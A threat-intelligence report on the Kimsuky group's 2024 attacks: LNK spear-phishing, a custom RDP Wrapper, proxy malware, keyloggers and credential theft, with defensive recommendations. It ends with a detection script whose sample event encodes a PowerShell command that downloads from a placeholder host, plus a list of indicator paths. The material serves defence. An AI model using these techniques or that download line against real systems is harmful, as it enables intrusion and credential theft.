Kimsuky Group Leveraging Custom RDP Wrapper In Recent Attacks

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.

Summary

Cyble Research and Intelligence Labs (CRIL) came across an article in which a security researcher documented how the Kimsuky threat group evolved its attack methods in 2024. The group kept using LNK malware in its spear-phishing campaigns while increasingly relying on tools such as RDP Wrapper and proxy malware for remote control of compromised systems instead of traditional backdoors.

The group continues to target Korean users by distributing malicious shortcut files disguised as document attachments, which, when executed, deploy PowerShell or Mshta to download and run additional payloads such as PebbleDash and custom-built RDP Wrappers. Additionally, Kimsuky utilizes proxy malware to bypass network restrictions, keyloggers to capture user keystrokes, and infostealers like forceCopy to extract credentials from web browsers.

Technical Detail

Threat actors are deploying spear-phishing attacks using malicious shortcut files (*.LNK) embedded with harmful commands. The inclusion of personal and company names in the file names suggests an effort to gather intelligence on specific targets.

These shortcut files are designed to look like legitimate documents, using Office-related icons such as PDF, Excel, or Word. When executed, they launch PowerShell or Mshta to retrieve and run additional payloads from external sources. The primary malware used to control infected systems remains PebbleDash and a custom RDP Wrapper; the builds recently developed and distributed by the attackers are largely unchanged from earlier versions.

RDP Wrapper is an open-source utility that enables the Remote Desktop feature on Windows editions that do not natively support it. The threat actors have built and deployed their own modified version of RDP Wrapper, most likely to facilitate unauthorized remote access. They are suspected of adding various export functions to the binary to evade file-based detection by security solutions.

In addition to using PebbleDash and RDP Wrapper for system control, the threat actors deploy various other malware, including proxy tools, keyloggers, and information stealers.

Even if the RDP service is enabled and a user account is added, external access to an infected system remains restricted if it is within a private network. To bypass this limitation, threat actors deploy proxy malware, which acts as an intermediary between the infected system and an external network, enabling remote access via RDP.

In previous attacks of the Kimsuky group, three primary types of proxy tools were identified. The first type, associated with the mutex “MYLPROJECT,” includes a launcher that reads a configuration file from a hardcoded path (e.g., C:\Programdata\USOShared2\version.ini) and uses this information to execute the proxy tool. The second type, identified by the mutex “LPROXYMUTEX,” functions similarly to a typical proxy. The third type is a Go-based revsocks tool, a publicly available utility on GitHub.

Recently discovered proxy tools follow a similar pattern, using distinct mutexes and receiving addresses as arguments to operate.

The Kimsuky group employs PowerShell scripts for keylogging and deploys keyloggers in executable format. Previously, captured keystrokes were primarily stored in "%LOCALAPPDATA%\CursorCach.tmp" and "%LOCALAPPDATA%\CursorCache.db". However, recent variants have been observed saving logged data to "C:\Programdata\joeLog.txt" and "C:\Programdata\jLog.txt", indicating a shift in storage methods.

The Kimsuky group utilizes a tool that extracts only the key value from the browser's “Local State” file rather than directly stealing the credentials stored in the web browser. This method is likely intended to bypass security products; the extracted key is later used to decrypt and steal the stored credentials.

A newly identified variant, named “forceCopy,” is designed for file copying. It operates by accepting the source file path as the first argument and the destination path as the second. Unlike traditional methods that rely on APIs like ReadFile(), this malware leverages the NTFS Parser library to read files, enhancing its stealth capabilities.

The malware is exclusively installed in web browser installation directories, suggesting that threat actors aim to evade environmental restrictions and steal browser configuration files containing stored credentials. This tactic is likely intended to bypass security products.

A notable difference from previous cases is the discovery of Injector and Loader malware. While the final payload running in memory remains unidentified, the Loader retrieves a file from "%SystemDirectory%\wbemback.dat" and loads it into memory. Meanwhile, the Injector operates by receiving parameters, such as the target process for injection.

Additionally, ReflectiveLoader has been identified among PowerShell scripts. Although obfuscated, it has been confirmed as an open-source script known as “Invoke-ReflectivePEInjection.ps1.” This script, along with other PowerShell-based malware, is installed in the "%ALLUSERSPROFILE%\USOShared\Prosd" directory.

Recommendation

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

  1. Implement monitoring to identify and alert on the execution of base64-encoded PowerShell scripts. Attackers frequently use these scripts to obfuscate malicious activities, making detection crucial for maintaining security.

  2. Implement monitoring to detect and alert on the installation of unauthorized software, such as RDP wrappers. Observing unexpected software installations can help identify potential threat actor activities early.

  3. Set up alerts for any modifications to Windows Defender exclusion paths, particularly those adding %APPDATA% and %TEMP% directories. Attackers often modify these paths to exclude malicious files from being scanned, making it essential to detect and respond to such changes promptly.

  4. Strengthen the security of Remote Desktop Protocol (RDP) by enforcing strong authentication mechanisms, such as multi-factor authentication (MFA) and network-level authentication (NLA). Limiting RDP access to trusted IP addresses and utilizing VPNs can also help mitigate risks.

  5. Use network segmentation to limit the spread of any potential compromises. By isolating critical systems and sensitive data, you can reduce the impact of an attacker gaining access through an RDP wrapper.
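As a defender's companion to the artifacts listed under Technical Detail and to recommendations 1 and 2, the following Python script is an added example (not code from the report, Cyble, or any vendor): it decodes PowerShell -EncodedCommand arguments and flags the file paths, directory names and script names this report names in constructed process-creation events. The event fields, the sample events and the explorer.exe parent heuristic are assumptions made for the example.

```python
"""Triage constructed process-creation events for the artifacts this report
describes. Added example, not code from the report or any vendor."""
import base64
import re

REPORT_ARTIFACTS = (  # paths and script names given in the report, lower-cased
    r"c:\programdata\usoshared2\version.ini", r"c:\programdata\joelog.txt",
    r"c:\programdata\jlog.txt", r"\cursorcach.tmp", r"\cursorcache.db",
    r"\wbemback.dat", r"\usoshared\prosd", "invoke-reflectivepeinjection")
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"(?i)\s-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)")

def encode_for_powershell(script):
    """Base64 of the UTF-16LE script, the form -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_powershell(cmdline):
    """Decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE, so not an encoded command

def triage_event(event):
    """Findings for one event dict with keys 'image', 'parent', 'cmdline'."""
    findings = []
    image, parent = event["image"].lower(), event["parent"].lower()
    decoded = decode_encoded_powershell(event["cmdline"])
    if image.endswith("powershell.exe") and decoded is not None:
        findings.append("encoded PowerShell (recommendation 1)")
    text = (event["cmdline"] + " " + (decoded or "")).lower()
    # Assumption: a double-clicked LNK runs under explorer.exe; the report says
    # the shortcut then launches PowerShell or Mshta to fetch a remote payload.
    if (image.endswith(("powershell.exe", "mshta.exe")) and parent.endswith("explorer.exe")
            and ("http://" in text or "https://" in text)):
        findings.append("explorer-spawned PowerShell/Mshta fetching remote content")
    findings += ["report artifact: " + a for a in REPORT_ARTIFACTS if a in text]
    return findings

SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -enc " + encode_for_powershell(
         r"iwr http://example.invalid/p -OutFile C:\Programdata\joeLog.txt")},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmdline": "svchost.exe -k netsvcs"},
]
```

Feed it Sysmon event ID 1 or Security event 4688 records mapped to the three fields; the first sample event yields three findings and the second none.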

Conclusion

In 2024, the Kimsuky group's attack methods evolved. While they continued using LNK malware in spear-phishing attacks for initial breaches, they increasingly relied on tools like RDP Wrapper and Proxy to remotely control compromised systems instead of deploying traditional backdoors. The group persistently targets Korean users with spear-phishing campaigns, often disguising malware as document attachments in emails. When executed, these files grant attackers control over the victim's system.
